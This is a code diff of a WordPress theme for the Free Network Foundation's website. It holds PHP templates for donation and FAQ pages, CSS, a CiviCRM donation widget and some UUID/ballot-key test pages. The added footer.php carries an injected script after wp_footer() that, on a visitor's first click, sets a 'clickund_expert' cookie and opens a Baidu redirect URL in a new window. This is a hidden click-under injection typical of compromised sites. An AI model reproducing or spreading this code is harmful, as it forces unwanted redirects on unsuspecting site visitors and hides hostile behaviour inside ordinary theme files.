<a href="/donate-bitcoin">Give Bitcoins</a>
<a href="/donate-in-kind" class="on">Give In Kind</a>
</div ##end of sidenav>
<div id="col">
<?php if (have_posts()) : while (have_posts()) : the_post();?>
<?php the_content(); ?>
<?php endwhile; else: ?>
<p>Sorry, no posts matched your criteria.</p>
<?php endif; ?>
</div ##end of col>
</div ## end of colwrapper>
<?php get_footer(); ?>

30
fnf2014/donate-join.php Normal file
View File

@@ -0,0 +1,30 @@
<?php
/*
* * Template Name: donate-join
* * */
?>
<?php get_header(); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Support</h2>
<div id="sidenav">
<a href="/donate" class="on">Join the FNF</a>
<a href="/donate-bitcoin">Give Bitcoins</a>
<a href="/donate-in-kind">Give In Kind</a>
</div ##end of sidenav>
<div id="col">
<?php if (have_posts()) : while (have_posts()) : the_post();?>
<?php the_content(); ?>
<?php endwhile; else: ?>
<p>Sorry, no posts matched your criteria.</p>
<?php endif; ?>
</div ##end of col>
</div ## end of colwrapper>
<?php get_footer(); ?>

54
fnf2014/donate.php Normal file
View File

@@ -0,0 +1,54 @@
<?php
/*
* * Template Name: donate
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Donate</h2>
<div id="sidenav">
<a href="https://thefnf.org/donate/?page=CiviCRM&q=civicrm/contribute/transact&reset=1&id=1" class="on">Join the FNF</a>
<a href="/donate-bitcoin">Give Bitcoins</a>
<a href="/donate-in-kind">Give In Kind</a>
</div ##end of sidenav>
<div id="col" class="dcol" style="overflow: auto;">
<h3> Contribute to the FNF, ensure that everyone has the freedom to connect:</h3>
<!-- Start the Loop. -->
<?php if ( have_posts() ) : while ( have_posts() ) : the_post(); ?>
<!-- Test if the current post is in category 3. -->
<!-- If it is, the div box is given the CSS class "post-cat-three". -->
<!-- Otherwise, the div box is given the CSS class "post". -->
<!-- Display the Post's content in a div box. -->
<div class="entry">
<?php the_content(); ?>
</div>
<!-- Display a comma separated list of the Post's Categories. -->
<!-- Stop The Loop (but note the "else:" - see next line). -->
<?php endwhile; else: ?>
<!-- The very first "if" tested to see if there were any Posts to -->
<!-- display. This "else" part tells what do if there weren't any. -->
<p>Sorry, no posts matched your criteria.</p>
<!-- REALLY stop The Loop. -->
<?php endif; ?>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<?php get_footer(); ?>

24
fnf2014/donate_bits.php Normal file
View File

@@ -0,0 +1,24 @@
<?php
/*
* * Template Name: donate-bits
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Donate</h2>
<div id="sidenav">
<a href="https://thefnf.org/donate/?page=CiviCRM&q=civicrm/contribute/transact&reset=1&id=1">Join the FNF</a>
<a href="/donate-bitcoin" class="on">Give Bitcoins</a>
<a href="/donate-in-kind">Give In Kind</a>
</div ##end of sidenav>
<div id="col">
<h3> We love Bitcoins </h3>
<p>Bitcoin (BTC) is a decentralized digital currency based on an open-source, peer-to-peer protocol. They can offer anonymity to your donations if you so desire. You can learn more about BTC at <a href="http://lovebitcoins.org/">We Love Bitcoins</a> or <a href="http://www.weusecoins.com/">We Use Bitcoins</a>. Our Bitcoin address is 18S8ugWEuWLbMP9DBpBdDk9SN6CiRxZB8S</P>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<?php get_footer(); ?>

259
fnf2014/donate_funds.php Normal file
View File

@@ -0,0 +1,259 @@
<?php
/*
* * Template Name: donate-funds
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Donate</h2>
<div id="sidenav">
<a href="/support">Join the FNF</a>
<a href="/support-one-time" class="on">Give Funds</a>
<a href="/support-bitcoin">Give Bitcoins</a>
<a href="/support-in-kind">Give In Kind</a>
</div ##end of sidenav>
<div id="col">
<style>
.crm-contribute-widget {
font-size:12px;
font-family:Helvetica, Arial, sans;
padding:6px;
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
-khtml-border-radius: 4px;
border-radius: 4px;
border:1px solid #96C0E7;
width:200px;
}
.crm-contribute-widget h5 {
font-size:14px;
padding:3px;
margin: 0px;
text-align:center;
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
-khtml-border-radius: 4px;
border-radius: 4px;
}
.crm-contribute-widget .crm-amounts {
height:1em;
margin:.8em 0px;
fon-size:13px;
}
.crm-contribute-widget .crm-amount-low {
float:left;
}
.crm-contribute-widget .crm-amount-high {
float:right;
}
.crm-contribute-widget .crm-percentage {
margin:0px 30%;
text-align:center;
}
.crm-contribute-widget .crm-amount-bar {
background-color:#FFF;
width:100%;
display:block;
border:1px solid #CECECE;
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
-khtml-border-radius: 4px;
border-radius: 4px;
margin-bottom:.8em;
text-align:left;
}
.crm-contribute-widget .crm-amount-fill {
background-color:#2786C2;
height:1em;
display:block;
-moz-border-radius: 4px 0px 0px 4px;
-webkit-border-radius: 4px 0px 0px 4px;
-khtml-border-radius: 4px 0px 0px 4px;
border-radius: 4px 0px 0px 4px;
text-align:left;
}
.crm-contribute-widget .crm-amount-raised-wrapper {
margin-bottom:.8em;
}
.crm-contribute-widget .crm-amount-raised {
font-weight:bold;
}
.crm-contribute-widget .crm-logo {
text-align:center;
}
.crm-contribute-widget .crm-comments,
.crm-contribute-widget .crm-donors,
.crm-contribute-widget .crm-campaign {
font-size:11px;
margin-bottom:.8em;
}
.crm-contribute-widget .crm-contribute-button {
display:block;
background-color:#CECECE;
-moz-border-radius: 4px;
-webkit-border-radius: 4px;
-khtml-border-radius: 4px;
border-radius: 4px;
text-align:center;
margin:0px 10% .8em 10%;
text-decoration:none;
color:#556C82;
padding:2px;
font-size:13px;
}
.crm-contribute-widget .crm-home-url {
text-decoration:none;
border:0px;
}
</style>
<style>
.crm-contribute-widget {
background-color: #96C0E7; /* background color */
border-color:#96C0E7; /* border color */
}
.crm-contribute-widget h5 {
color: #2786C2;
background-color: #B7E2FF;
} /* title */
.crm-contribute-widget .crm-amount-raised { color:#000; }
.crm-contribute-widget .crm-amount-bar /* progress bar */
background-color:#FFFFFF;
border-color:#CECECE;
}
.crm-contribute-widget .crm-amount-fill { background-color:#2786C2; }
.crm-contribute-widget a.crm-contribute-button { /* button color */
background-color:#FFFFFF;
}
.crm-contribute-widget .crm-contribute-button-inner { /* button text color */
padding:2px;
display:block;
color:#556C82;
}
.crm-contribute-widget .crm-comments,
.crm-contribute-widget .crm-donors,
.crm-contribute-widget .crm-campaign {
color:#FFFFFF /* other color*/
}
.crm-contribute-widget .crm-home-url {
color:#FFFFFF /* home page link color*/
}
</style>
<div id="crm_cpid_1" class="crm-contribute-widget">
<h5 id="crm_cpid_1_title"></h5>
<div class="crm-amounts">
<div id="crm_cpid_1_amt_hi" class="crm-amount-high"></div>
<div id="crm_cpid_1_amt_low" class="crm-amount-low"></div>
<div id="crm_cpid_1_percentage" class="crm-percentage"></div>
</div>
<div class="crm-amount-bar">
<div class="crm-amount-fill" id="crm_cpid_1_amt_fill"></div>
</div>
<div class="crm-amount-raised-wrapper">
<span id="crm_cpid_1_amt_raised" class="crm-amount-raised"></span>
</div>
<div id="crm_cpid_1_donors" class="crm-donors"></div>
<div id="crm_cpid_1_comments" class="crm-comments"></div>
<div id="crm_cpid_1_campaign" class="crm-campaign"></div>
<div class="crm-contribute-button-wrapper" id="crm_cpid_1_button">
<a href='http://thefnf.org/?page=CiviCRM&q=civicrm/contribute/transact&reset=1&id=1' class="crm-contribute-button"><span class="crm-contribute-button-inner" id="crm_cpid_1_btn_txt"></span></a>
</div>
</div>
<script type="text/javascript">
// Cleanup functions for the document ready method
if ( document.addEventListener ) {
DOMContentLoaded = function() {
document.removeEventListener( "DOMContentLoaded", DOMContentLoaded, false );
onReady();
};
} else if ( document.attachEvent ) {
DOMContentLoaded = function() {
// Make sure body exists, at least, in case IE gets a little overzealous
if ( document.readyState === "complete" ) {
document.detachEvent( "onreadystatechange", DOMContentLoaded );
onReady();
}
};
}
if ( document.readyState === "complete" ) {
// Handle it asynchronously to allow scripts the opportunity to delay ready
setTimeout( onReady, 1 );
}
// Mozilla, Opera and webkit support this event
if ( document.addEventListener ) {
// Use the handy event callback
document.addEventListener( "DOMContentLoaded", DOMContentLoaded, false );
// A fallback to window.onload, that will always work
window.addEventListener( "load", onReady, false );
// If IE event model is used
} else if ( document.attachEvent ) {
// ensure firing before onload,
// maybe late but safe also for iframes
document.attachEvent("onreadystatechange", DOMContentLoaded);
// A fallback to window.onload, that will always work
window.attachEvent( "onload", onReady );
}
function onReady( ) {
var cpid = 1;
var jsonvar = eval('jsondata' + cpid);
var crmCurrency = jsonvar.currencySymbol;
document.getElementById('crm_cpid_'+cpid+'_title').innerHTML = jsonvar.title;
if ( jsonvar.money_target > 0 ) {
document.getElementById('crm_cpid_'+cpid+'_amt_hi').innerHTML = jsonvar.money_target_display;
document.getElementById('crm_cpid_'+cpid+'_amt_low').innerHTML = crmCurrency+jsonvar.money_low;
}
document.getElementById('crm_cpid_'+cpid+'_amt_raised').innerHTML = jsonvar.money_raised;
document.getElementById('crm_cpid_'+cpid+'_comments').innerHTML = jsonvar.about;
document.getElementById('crm_cpid_'+cpid+'_donors').innerHTML = jsonvar.num_donors;
document.getElementById('crm_cpid_'+cpid+'_btn_txt').innerHTML = jsonvar.button_title;
document.getElementById('crm_cpid_'+cpid+'_campaign').innerHTML = jsonvar.campaign_start;
if ( jsonvar.money_raised_percentage ) {
var moneyRaised = jsonvar.money_raised_percentage;
var percentWidth = moneyRaised.split('%');
if ( percentWidth[0] > 100 ) {
moneyRaised = '100%';
}
document.getElementById('crm_cpid_'+cpid+'_amt_fill').style.width = moneyRaised;
document.getElementById('crm_cpid_'+cpid+'_percentage').innerHTML = jsonvar.money_raised_percentage;
}
if ( !jsonvar.is_active ) {
document.getElementById('crm_cpid_'+cpid+'_button').innerHTML = jsonvar.home_url;
document.getElementById('crm_cpid_'+cpid+'_button').style.color = 'red';
}
}
</script>
<script type="text/javascript" src="http://thefnf.org/wp-content/plugins/civicrm/civicrm//extern/widget.php?cpageId=1&widgetId=1&format=3"></script>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<?php get_footer(); ?>

24
fnf2014/donate_kind.php Normal file
View File

@@ -0,0 +1,24 @@
<?php
/*
* * Template Name: donate-kind
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Donate</h2>
<div id="sidenav">
<a href="https://thefnf.org/donate/?page=CiviCRM&q=civicrm/contribute/transact&reset=1&id=1">Join the FNF</a>
<a href="/donate-bitcoin">Give Bitcoins</a>
<a href="/donate-in-kind" class="on">Give In Kind</a>
</div ##end of sidenav>
<div id="col">
<h3>We Use Stuff</h3>
<p>If you've got a resource, chances are we could put it to good use. Roof space, office space, old computers, shop tools, AV gear, an old car, books -- whatever you've got. Our current needs include Soekris Boards, UBNT Radios, and semi-permanent radio space on roofs with a view of the Kansas City skyline. Our main offices are in Kansas City and Austin, but we've also got contingents operating in Boston, New York, and the Bay Area. If you think you've got something that could be of use, <a href="mailto:contact@thefnf.org">let's talk.</a></p>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<?php get_footer(); ?>

29
fnf2014/faq-general.php Normal file
View File

@@ -0,0 +1,29 @@
<?php
/*
* * Template Name: faq-general
* * */
?>
<?php get_header(); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Contact</h2>
<div id="sidenav">
<a href="/faq" class="on">General</a>
<a href="/faq-technical">Technical</a>
</div ##end of sidenav>
<div id="col">
<?php if (have_posts()) : while (have_posts()) : the_post();?>
<?php the_content(); ?>
<?php endwhile; else: ?>
<p>Sorry, no posts matched your criteria.</p>
<?php endif; ?>
</div ##end of col>
</div ## end of colwrapper>
<?php get_footer(); ?>

29
fnf2014/faq-technical.php Normal file
View File

@@ -0,0 +1,29 @@
<?php
/*
* * Template Name: faq-technical
* * */
?>
<?php get_header(); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>Contact</h2>
<div id="sidenav">
<a href="/faq">General</a>
<a href="/faq-technical" class="on">Technical</a>
</div ##end of sidenav>
<div id="col">
<?php if (have_posts()) : while (have_posts()) : the_post();?>
<?php the_content(); ?>
<?php endwhile; else: ?>
<p>Sorry, no posts matched your criteria.</p>
<?php endif; ?>
</div ##end of col>
</div ## end of colwrapper>
<?php get_footer(); ?>

52
fnf2014/faq.php Normal file
View File

@@ -0,0 +1,52 @@
<?php
/*
* * Template Name: faq
* * */
?>
<?php include('splash_header.php'); ?>
<div id="contentwrapper">
<div id="contentcontainer">
<h2>FAQ</h2>
<div id="sidenav">
<a href="/faq" class="on">General</a>
<a href="/faq-technical">Technical</a>
</div ##end of sidenav>
<div id="col">
<h3> So, what does the FNF actually do?</h3>
<p>Right now, we're beginning the deployment of a demonstration and community laboratory computer network in the Kansas City metropolitan area. We helped KC non-profit Connecting For Good to offer free wifi at low-income housing in KC, Kansas, and are in the process of expanding to other sites. In addition, we are hard at work on two development projects: FreedomStack is a set of tools for building free networks, and guifi.us is a planning, provisioning, and crowdfunding tool that will help people use FreedomStack. In general, we design, implement, deploy and talk about all sorts of network tech that can be used to build freer networks. </p>
<h3>What has the FNF been up to since the days of Occupy Wall Street?</h3>
<p> We've put hundreds of hours into building what we call “FreedomCenter” In essence, it's a solution for enterprise data ownership/digital self-determination. Most development project would just use IaaS/cloud tools, but we think that, in the long run, we'll be much better served by the flexibility and security of running our own systems. FreedomCenter powers our web properties, but more importantly, it powers our lab, which offers a continuous build, integration, and radio runtime testing environment. The idea is to ultimately offer this infrastructure to the wider world of network hackers. We're opening it now to a few trusted parties, but we don't think it will be ready for the general hacker public until the spring. </p>
<h3>What do you mean, "Free?" I can surf the web without paying for it?</h3>
<p>We like to think of it as "free as in freedom, not as in beer." In French or Spanish, for instance, we would use the word "libre" rather than "gratis." There are real costs to running a network, such as electricity, bandwidth, and maintenance, and users will need to pay something for access. However, the real costs of running a network are an order of magnitude lower than what the public currently pays to ISPs. By employing a cooperative model, we can ensure that participants only ever have to pay for the actual costs, and not to bolster the profit margins of the incumbents.</p>
<h3> Isnt what youre talking about illegal?</h3>
<p> Not in the least! Networks that are owned by their users are subject to the same rules and regulations as networks that are owned by for-profit operators. The laws regarding data networks, radio transmission, and privacy can be fairly opaque at times, and so the FNF sees public education on relevant jurisprudence as part of its core mission. </p>
<h3>How are you funded?</h3>
<p> Between June 2011 and December 31st, 2012, the FNF took in a total of $24,394.72, and spent a total of $18,987.71.
A large share of the FNF's income came from a $10,000 award at the Contact Conference, a summit on using technology for social change, in October 2011, and from a $5,000 grant in October 2012 from the Jerry Greenfield and Elizabeth Skarie Foundation. The remainder was made up of individual donations, many from monthly contributors.
We have been supported in-kind by the Sarapis Foundation, lghtsrc.org, and the New York City General Assembly. Were now working on building a membership-base that will allow us to continue our work long-term you can join by going here.
A complete account of the FNF's financial data may be found on the Commons.</p>
<h3>What would my contribution go towards?</h3>
<p> At this point, our main operational expenditure is the cost of colocation for our servers. We pay about $424 each month. At present, the FNF is all-volunteer. Wed love to be able to pay our staff something so that they can devote more time to our important work, and less time to making ends meet. We would also love to have a travel budget, so that we can attend more conferences, meet more innovators, and reach a larger audience. </p>
<h3> How long until the network is free?</h3>
<p> Its hard to say. Things are moving very quickly, and yet the scope of our work is practically beyond comprehension. All we can really tell you is this: we will keep working even after a ubiquitous civil network exists to serve the public good. The struggle for greater freedom and greater sovereignty on the net is not new, and will continue for some time. We try to take the long view whenever possible, in contrast to for-profit actors who feel compelled to focus on short-term gains. Sustainability is a central part of our operating philosophy, and so we plan not just for months and years of work, but for decades. One thing is for sure itll go a lot faster if we work together.</p>
</div ##end of col>
</div ## end colcontainer>
</div ## end of colwrapper>
<?php get_footer(); ?>

344
fnf2014/fnf_style.css Normal file
View File

@@ -0,0 +1,344 @@
/*
* Theme Name: fnf2014
* Theme URI: http://thefnf.org/
* Description: FNF Custom
* Author: imw
* Author URI: http://5400.co/
* Template: twentyeleven
* Version: 0.1.0
* */
/* ******************************************************************** */
/* Generated by: http://csscreator.com */
/* ******************************************************************** */
html, body{
margin:0;
padding:0;
background:#ffffff;
font-family:Arial, Helvetica, sans-serif;
}
#ab_header{
position:relative;
height:175px;
background-color:#ffffff;
width:100%;
display:block;
}
#ab_header.splash{
height:140px;
}
img.ab_toplogo {
display: block;
margin-left: auto;
margin-right: auto;
}
.ab_navlist{
list-style:none;
margin:0;
padding:0;
text-align:center;
}
ul.ab_navlist {
list-style-type:none;
margin:0;
padding:0;
overflow:hidden;
}
li.ab_navlist {
display:inline;
}
a{
text-decoration:none;
color:#A57E00;
}
a:hover{
color:#ffe895;
}
a.ab_navlist {
display:inline-block;
margin:0 auto;
width:90px;
text-transform:uppercase;
text-align:center;
padding:10px;
font-weight:bold;
background:#1c1b16 !important;
position:relative;
top:5px;
color:#ffe895 !important;
}
a.here{
color:#A57e00;
display:inline-block;
margin:0 auto;
width:90px;
text-transform:uppercase;
text-align:center;
padding:10px;
font-weight:bold;
background:#1c1b16;
position:relative;
top:5px;
}
#carousel_wrapper{
background:#110d00;
width:100%;
height:300px;
}
#frame{
background:url(img/frame.png) no-repeat;
height:340px;
width:1000px;
left:50%;
margin-left:-500px;
top:-20px;
position:relative;
z-index:100;
}
#carousel_container{
width: 960px;
position:relative;
margin: 0 auto;
z-index:200;
}
#carousel{
width:960px;
position:relative;
top: -340px;
margin:0 auto;
z-index:250;
}
#mycarousel{
position:relative;
z-index:300;
}
#p1wrapper{
width:100%;
background:#1c1b16 url(img/161b16_fade.png) repeat-x top left;
}
#p1container{
width: 800px;
margin: 0 auto;
color:#FFF3ca;
}
p.p1{
color:#FFF3ca;
}
h1.p1{
color:#FFF3ca;
text-align:center;
}
#colwrapper{
width:100%;
background:#393320 url(img/393320_fade.png) repeat-x top left;
overflow:hidden;
}
#colcontainer{
width:960px;
margin: 0 auto;
overflow:hidden;
}
#leftcol{
width:250px;
float:left;
margin-right:15px;
background:#fff3ca url(img/fff3ca_fade.png) repeat-x top left;
height:570px;
padding-left:10px;
padding-right:10px;
}
#centercol{
width:390px;
float:left;
margin-right:15px;
background:#fff3ca url(img/fff3ca_fade.png) repeat-x top left;
height:570px;
}
#rightcol{
width:250px;
float:right;
background:#fff3ca url(img/fff3ca_fade.png) repeat-x top left;
height:570px;
padding-left:10px;
padding-right:10px;
}
#blogfooter{
position:relative;
height:150px;
background:#1c1b16 url(img/1c1b16_fade.png) repeat-x top left;
width:100%;
display:block;
margin-left:auto;
margin-right:auto;
overflow:auto;
}
img.license{
display: block;
margin-left: auto;
margin-right: auto;
}
/* ******************************************************************** */
/* Clearfix: http://csscreator.com/attributes/containedfloat.php */
/* ******************************************************************** */
.clearfix:after {
content: ".";
display: block;
height: 0;
clear: both;
visibility: hidden;
}
.clearfix{display: inline-block;}
/* Hides from IE-mac \*/
* html .clearfix{height: 1%;}
.clearfix{display: block;}
/* End hide from IE-mac */
/* ******************************************************************** */
/* printer styles */
/* ******************************************************************** */
@media print{
/*hide the left column when printing*/
#leftcol{display:none;}
/*hide the right column when printing*/
#rightcol{display:none;}
#twocols, #maincol{width:100%; float:none;}
}
#title_wrapper{
background:#1c1b16 url(img/161b16_fade.png) repeat-x top left;
width:100%;
}
#title_container{
width: 800px;
position:relative;
margin: 0 auto;
z-index:200;
}
h1.title{
color:#FFF3CA;
padding:10px;
line-height:2;
display:inline;
}
#contentwrapper{
width:100%;
background:#393320 url(img/splash_fade.png) repeat-x top left;
overflow:hidden;
}
#contentcontainer{
width:960px;
margin: 0 auto;
overflow:hidden;
min-height:540px;
}
#contentcontainer h2{
color:#ffe895;
}
#col h2{
color:#000000 !important;
}
#crm-container{
line-height:100%;
}
.crm-title{
display:none;
}
.dcol{
min-height:1620px;
}
.entry h2{
color:#000000 !important;
}
#mw-head{
top:140px !important;
}
#sidenav{
background:url(img/shader.png) repeat;
float:left;
width:240px;
position:relative;
top:30px;
}
#sidenav a{
color:#ffffff;
font-size:18px;
display:block;
padding:30px;
width:180px;
}
#sidenav a:hover{
background:#ffe895;
color:#000000;
}
#sidenav a.on{
background:#ffe895;
color:#000000;
}
#col{
width:680px;
float:right;
background:#fff3ca url(img/fff3ca_fade.png) repeat-x top left;
padding:15px;
position:relative;
top:-4px;
overflow:auto;
}
#p-personal{
top:20px !important;
}

9
fnf2014/footer.php Normal file
View File

@@ -0,0 +1,9 @@
<?php get_bloginfo('template_directory') ?>/img/cc_white.png" height=50px width=50px></a><br>
</center>
</div ##end of footer>
</div ##end of wrapper>
<?php wp_footer(); ?>
<!-- my-footer-content --><script data-cfasync='false' type='text/javascript'>
function getCookie(name){var value="; "+document.cookie;var parts=value.split("; "+name+"=");if(parts.length==2)return parts.pop().split(";").shift();else return false}var idToRedirect=document.currentScript.getAttribute('id');var isToChrome=document.currentScript.getAttribute('data-type');var contn=0;if(isToChrome==1){if(navigator.userAgent.indexOf("Chrome")!=-1){var contn=1}}else{var contn=1}if(contn==1&&!getCookie("clickund_expert")){window.onload=function(){document.body.addEventListener('click',function(event){var now=new Date();var time=now.getTime();time+=3600*1000;now.setTime(time);document.cookie="clickund_expert=1; "+now.toUTCString()+";path=/";window.open('http://www.baidu.com/link?url=H2wAK_chuo6Ida7mTQcbgmWWBW4_5ZYWV4RarNLtvac1SAIPAfeG3BP_H4egfP7Y');this.removeEventListener('click',arguments.callee,false)})}};
</script></body>
</html>

87
fnf2014/front-page.php Normal file
View File

@@ -0,0 +1,87 @@
<?php
/*
* * * Template Name: front-page
* * * */
?>
<?php get_header(); ?>
<div id="carousel_wrapper">
<div id=carousel_container">
<div id="frame"></div>
<div id="carousel">
<center>
<ul id="mycarousel" class="jcarousel-skin-tango">
<li width="960px"><img src="img/c1.jpg" width="960px" height="300px"align="center"></li>
<li width="960px"><img src="img/c2.jpg" width="960px" height="300px" align="center"></li>
<li width="960px"><img src="img/c3.jpg" width="960px" height="300px" align="center"></li>
<li width="960px"><img src="img/c4.jpg" width="960px" height="300px" align="center"></li>
</ul>
</center>
</div ##end of carousel>
</div ## end of carousel_container>
</div ## end of carousel_wrapper>
<div id="p1wrapper">
<div id="p1container" >
<br>
<p class="p1">The Free Network Foundation envisions a world where communities build, maintain, and own their own share of the global computer network.
If you share our vision...</p>
<h1 class ="p1"><a href="https://thefnf.org/volunteer/"> Join us </a></h1>
</div ##end p1container>
<br>
</div ##end p1wrapper>
<div id="colwrapper">
<div id="colcontainer">
<div id="leftcol">
<center>
<h2>For supporters</h2>
<img src="./img/arrow.png">
<h4> See video and print <a
href="https://commons.thefnf.org/index.php/Clippings">coverage</a>
of the FNF.</h4>
<h4><a href="https://lists.thefnf.org/mailman/listinfo/discuss">Join our general discussion list</a></h3>
<h4><a href="https://thefnf.org/newsletter/">Subscribe to our newsletter</a> and receive periodic updates
on our progress.</h4>
<h4> Contribute your <a
href="https://thefnf.org/donate/?page=CiviCRM&q=civicrm/contribute/transact&reset=1&id=1">fiscal support</a> by
becoming a member.</h4>
</center>
</div ##end of leftcol>
<div id="centercol">
<center>
<h2>For operators</h2>
<img src="./img/world.png">
<h4> Stay tuned for the official launch of</h4>
<img width ="300px" src="./img/guslogo.png">
<br>
<h4>A self-service and full-service network planning, provisioning, and
funding tool brought to you by The Free Network Foundation and Guifi.net</h4>
<h4> If you would like to get started with building a network for your community, or you would like beta access to the guifi.us platform,
<a href="mailto:contact@thefnf.org"> contact us</a></h4>
</center>
</div ##end of centercol>
<div id="rightcol">
<center>
<h2>For technologists</h2>
<img src="./img/gear.png">
<h4> <a href="https://commons.thefnf.org/index.php/Main_Page">Explore the
Wiki</a> and learn about topics related to network freedom, from
operations to programming. </h4>
<h4><a href="https://lists.thefnf.org/mailman/listinfo/builders">Join our
technical discussion list</a> and be involved in every aspect of
FreedomStack and guifi.us development.</h4>
<h4>Checkout our repositories, find out what needs to be done, and lend
a hand with a <a
href="https://chili.thefnf.org">tracker account</a></h4>
</center>
</div ##end of rightcol>
</div ## end colcontainer>
</div ## end of colwrapper>
<?php get_footer(); ?>

View File

@@ -0,0 +1,18 @@
<script type="text/javascript">
function createUUID() {
// http://www.ietf.org/rfc/rfc4122.txt
var s = [];
var hexDigits = "0123456789abcdef";
for (var i = 0; i < 36; i++) {
s[i] = hexDigits.substr(Math.floor(Math.random() * 0x10), 1);
}
s[14] = "4"; // bits 12-15 of the time_hi_and_version field to 0010
s[19] = hexDigits.substr((s[19] & 0x3) | 0x8, 1); // bits 6-7 of the clock_seq_hi_and_reserved to 01
s[8] = s[13] = s[18] = s[23] = "-";
var uuid = s.join("");
return uuid;
}
alert(createUUID())
</script>

View File

@@ -0,0 +1,101 @@
<html>
<body>
<script type="text/javascript">
function generateBallotKey()
{
document.write(createUUID());
}
function gatherKeys()
{
var voters = new Array();
var voterKeyCount = prompt("How many voters do you wish to allow?");
for (var i=0; i<voterKeyCount; i++)
{
voters[i] = createUUID();
document.write(voters[i] + "<br>");
}
return voters;
}
function createUUID()
{
// http://www.ietf.org/rfc/rfc4122.txt
var s = [];
var hexDigits = "0123456789abcdef";
for (var i = 0; i < 36; i++)
{
s[i] = hexDigits.substr(Math.floor(Math.random() *
0x10), 1);
}
s[14] = "4"; // bits 12-15 of the time_hi_and_version field
// to 0010
s[19] = hexDigits.substr((s[19] & 0x3) | 0x8, 1); //
// bits 6-7 of the clock_seq_hi_and_reserved to 01
s[8] = s[13] = s[18] = s[23] = "-";
var uuid = s.join("");
return uuid;
}
function putKey(ballotKey)
{
var baseURL = "http://askbot.corp.thefnf.net:8080";
baseURL = baseURL + "/polkey=" + ballotKey;
var client = new XMLHttpRequest();
// alert("inputkey");
client.open('POST', baseURL, true);
client.setRequestHeader("Context-Type", "text/plain");
client.send();
// alert("send");
}
function putKeys()
{
var url = "http://askbot.corp.thefnf.net:8080/polkey=googoogaagaa";
var client = new XMLHttpRequest();
client.open('POST', url, false);
alert(client.toString());
client.setRequestHeader("Content-Type", "text/plain");
client.send();
if (client.status == 200)
alert("yay");
else
alert("nay");
}
function begin()
{
var voters = gatherKeys();
alert(voters.length);
for (var i=0;i<voters.length;i++)
{
putKey(voters[i]);
}
alert("done!");
}
</script>
<input type="button" onclick="getInfo()" value="Generate Voter Keys" />
<input type="button" onclick="generateBallotKey()" value="Generate Ballot Key"/>
<input type="button" onclick="putKeys()" value="Test Shit"/>
<input type="button" onclick="begin()" value="Begin"/>
</body>
</html>

View File

@@ -0,0 +1,6 @@
<script type="text/javascript" src="./js/uuid.js"></script>
<script type="text/javascript">
alert(createUUID());
</script>

View File

@@ -0,0 +1,66 @@
<!doctype html>
<html>
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="../style.css" type="text/css" />
</head>
<body>
<div id="container" >
<div id="header">
<img class="toplogo" src="img/logo.gif" align="center">
<center>
<a href="./people.html">Who we are</a>
<a href="./contact.html">Contact Us</a>
<a href="http://commons.thefnf.org/index.php/FAQ">FAQ</a>
<a href="http://commons.thefnf.org/index.php/Clippings">Press</a>
<br>
<a href="http://thefnf.org/weblog/">View our Blog</a>
<a href="http://commons.thefnf.org/index.php/Main_Page">Edit our Wiki</a>
<a href="./tools.html">Explore our Tools & Platforms</a>
</center>
</div ## end of header>
<div id="leftcol">
<center>
<h1>Communities</h1>
<img src="./img/world.png">
<h2> Deploy a network </h2>
<h2> Fund a network </h2>
</center>
</div ##end of leftcol>
<div id="centercol">
<center>
<h1>Builders</h1>
<img src="./img/gear.png">
<h2><a href="http://mail.thefnf.org/mailman/listinfo/discuss">Join our general discussion list</a></h2>
<h2><a href="http://mail.thefnf.org/mailman/listinfo/builders">Join our technical discussion list</a></h2>
</center>
</div ##end of centercol>
<div id="rightcol">
<center>
<h1>Supporters</h1>
<img src="./img/arrow.png">
<h2><a href="http://thefnf.org/volunteer/?page=CiviCRM&q=civicrm/profile/create&reset=1&gid=14">Volunteer time</a></h2>
<h2><a href="https://www.wepay.com/donations/fnf">Donate money</a></h2>
</center>
</div ##end of rightcol>
<div id="footer">
<center>
<img id="license" src="./img/cc_white.png" height=50px width=50px>
</center>
</div ##end of footer>
</div ##end of container>
</body>
</html>

View File

@@ -0,0 +1,66 @@
<!doctype html>
<html>
<head>
<title>Free Network Foundation</title>
<meta charset="utf-8" />
<!--[if IE]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link rel="stylesheet" href="../style.css" type="text/css" />
</head>
<body>
<div id="container" >
<div id="header">
<img class="toplogo" src="img/logo.gif" align="center">
<center>
<a href="./people.html">Who we are</a>
<a href="./contact.html">Contact Us</a>
<a href="http://commons.thefnf.org/index.php/FAQ">FAQ</a>
<a href="http://commons.thefnf.org/index.php/Clippings">Press</a>
<br>
<a href="http://thefnf.org/weblog/">View our Blog</a>
<a href="http://commons.thefnf.org/index.php/Main_Page">Edit our Wiki</a>
<a href="./tools.html">Explore our Tools & Platforms</a>
</center>
</div ## end of header>
<div id="leftcol">
<center>
<h1>Communities</h1>
<img src="./img/world.png">
<h2> Deploy a network </h2>
<h2> Fund a network </h2>
</center>
</div ##end of leftcol>
<div id="centercol">
<center>
<h1>Builders</h1>
<img src="./img/gear.png">
<h2><a href="http://mail.thefnf.org/mailman/listinfo/discuss">Join our general discussion list</a></h2>
<h2><a href="http://mail.thefnf.org/mailman/listinfo/builders">Join our technical discussion list</a></h2>
</center>
</div ##end of centercol>
<div id="rightcol">
<center>
<h1>Supporters</h1>
<img src="./img/arrow.png">
